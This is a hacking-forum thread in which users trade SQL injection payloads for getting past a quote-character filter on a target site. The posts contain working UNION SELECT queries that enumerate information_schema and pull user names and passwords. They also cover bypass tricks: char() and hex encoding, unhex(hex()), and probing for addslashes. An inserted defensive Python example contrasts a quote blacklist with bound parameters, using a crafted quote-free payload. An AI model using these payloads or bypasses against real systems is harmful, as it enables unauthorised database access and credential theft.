| Author |
SQLi with character filters - how to? |
espartaniac
Member
Posts: 7
Location:
Joined: 12.07.11 Rank: Active User Warn Level: 5
|
|
Hey guys. How do I proceed with SQLi when there seems to be some sort of character filter?
Whenever I use ', for example, I get an error. That becomes an issue when I try something like:
UNION ALL SELECT 1,2,column_name,4 FROM information_schema.columns WHERE table_name='table'--
I've tried using things like table_name=CHR(39)||table||CHR(39) with no success.
Any ideas?  |
|
| Author |
RE: SQLi with character filters - how to? |
spyware
Member

Posts: 4190
Location: The Netherlands
Joined: 14.04.07 Rank: God Warn Level: 90
|
|
It's char(12,34,45,56).
Not sure if chr() is a valid command. If you run into filters, try to replicate them and test locally.

"The chowner of property." - Zeph Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term. - Carl Sagan Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor? - Ebert |
|
| Author |
RE: SQLi with character filters - how to? |
eax
Member
Posts: 4
Location:
Joined: 09.07.11 Rank: Apprentice |
|
|
http://wocares.com/noquote.php |
|
| Author |
RE: SQLi with character filters - how to? |
spyware
Member

Posts: 4190
Location: The Netherlands
Joined: 14.04.07 Rank: God Warn Level: 90
|
|
http://hackvertor.co.uk |
|
| Author |
RE: SQLi with character filters - how to? |
espartaniac
Member
Posts: 7
Location:
Joined: 12.07.11 Rank: Active User Warn Level: 5
|
|
Thanks for the tips guys, but still no results.
I tried these inputs:
union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(0x27,users,0x27)--
union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)usersCHAR(39)--
union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)||users||CHAR(39)--
union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(CHAR(39),users,CHAR(39))--
I've also tried substituting ='users' and 'users' for CHAR(xxx). No cigar.
It is strange that the first one doesn't work, because if I try something like:
union all select null,null,CONCAT(users,0x27,pass),null,null,null,null,null from users--
it works.... so it shouldn't be a problem with CONCAT.
Any more ideas?
Edited by espartaniac on 16-07-11 01:01 |
|
| Author |
RE: SQLi with character filters - how to? |
Tucak
Member
Posts: 19
Location:
Joined: 04.06.08 Rank: God |
|
|
It should be something like WHERE table_name=char(1,2,3,4) |
|
| Author |
RE: unhex(hex()) |
s0lar
Member

Posts: 4
Location:
Joined: 22.07.11 Rank: Newbie |
|
Have you tried the unhex(hex()) method? That always seems to work for me.
And it's also worth adding a \ character before your single quotes to see if they're still using addslashes or something equally pathetic.
 |
|
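Added example, not part of any post in this thread: it shows from the defender's side why a filter that only rejects quote characters does not stop injection, and what a bound parameter changes. Python's sqlite3 stands in for the database discussed above; the tables, rows, function names and the crafted input are constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT);
        CREATE TABLE users (name TEXT, pass TEXT);
        INSERT INTO articles VALUES (1, 'hello');
        INSERT INTO users VALUES ('admin', 'constructed-hash');
    """)
    return db

def quote_filter(value):
    """Hypothetical blacklist of the kind described in the thread."""
    if "'" in value or '"' in value:
        raise ValueError("illegal character")
    return value

def lookup_filtered(db, article_id):
    # Weak: the value lands in a numeric context, so the statement can be
    # rewritten without any quote, and char() builds strings without one.
    sql = "SELECT title FROM articles WHERE id = " + quote_filter(article_id)
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, article_id):
    # Fixed: the driver passes the value as data; it is never parsed as SQL.
    sql = "SELECT title FROM articles WHERE id = ?"
    return [row[0] for row in db.execute(sql, (article_id,))]

# Constructed input containing no quote characters.
CRAFTED = "0 UNION ALL SELECT pass FROM users WHERE name = char(97,100,109,105,110)"

def demo():
    db = make_db()
    return {
        "filtered_normal": lookup_filtered(db, "1"),
        "filtered_crafted": lookup_filtered(db, CRAFTED),
        "bound_normal": lookup_bound(db, "1"),
        "bound_crafted": lookup_bound(db, CRAFTED),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The filtered lookup returns a row from the users table for the crafted input, while the bound lookup returns nothing for it and still serves the normal request.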
| Author |
RE: SQLi with character filters - how to? |
gr00ve_hacker
Member

Posts: 3
Location: Your 127.0.0.1
Joined: 13.01.11 Rank: HBH Guru |
|
You might want to have a look here:
http://www.youtube.com/watch?v=EWQoAoJix2I
http://gr00ve-hack3r.com
Hacking articles, videos, Downloads and much more |
|